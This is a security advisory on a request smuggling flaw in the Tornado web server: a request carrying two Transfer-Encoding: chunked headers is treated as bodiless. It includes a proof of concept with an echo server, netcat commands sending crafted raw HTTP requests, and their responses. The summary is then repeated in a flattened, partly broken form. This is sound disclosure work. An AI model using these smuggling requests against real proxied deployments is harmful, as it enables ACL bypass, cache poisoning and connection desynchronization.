Summary
When Tornado receives a request with two Transfer-Encoding: chunked
headers, it ignores them both. This enables request smuggling when Tornado is deployed behind a proxy server that emits such requests. Pound does this.
PoC
- Install Tornado.
- Start a simple Tornado server that echoes each received request's body:
cat << EOF > server.py
import asyncio
import tornado
class MainHandler(tornado.web.RequestHandler):
def post(self):
self.write(self.request.body)
async def main():
tornado.web.Application([(r"/", MainHandler)]).listen(8000)
await asyncio.Event().wait()
asyncio.run(main())
EOF
python3 server.py &
- Send a valid chunked request:
printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000
- Observe that the response is as expected:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:32:05 GMT
Content-Length: 1
Z
- Send a request with two
Transfer-Encoding: chunked
headers:
printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000
- Observe the strange response:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:35:40 GMT
Content-Length: 0
HTTP/1.1 400 Bad Request
This is because Tornado believes that the request has no message body, so it tries to interpret 1\r\nZ\r\n0\r\n\r\n
as its own request, which causes a 400 response. With a little cleverness involving chunk-ext
s, you can get Tornado to instead respond 405, which has the potential to desynchronize the connection, as opposed to 400 which should always result in a connection closure.
Impact
Anyone using Tornado behind a proxy that forwards requests containing multiple Transfer-Encoding: chunked
headers is vulnerable to request smuggling, which may entail ACL bypass, cache poisoning, or connection desynchronization.
References
Summary
When Tornado receives a request with two
Transfer-Encoding: chunked
headers, it ignores them both. This enables request smuggling when Tornado is deployed behind a proxy server that emits such requests. Pound does this.PoC
Transfer-Encoding: chunked
headers:This is because Tornado believes that the request has no message body, so it tries to interpret
1\r\nZ\r\n0\r\n\r\n
as its own request, which causes a 400 response. With a little cleverness involvingchunk-ext
s, you can get Tornado to instead respond 405, which has the potential to desynchronize the connection, as opposed to 400 which should always result in a connection closure.Impact
Anyone using Tornado behind a proxy that forwards requests containing multiple
Transfer-Encoding: chunked
headers is vulnerable to request smuggling, which may entail ACL bypass, cache poisoning, or connection desynchronization.References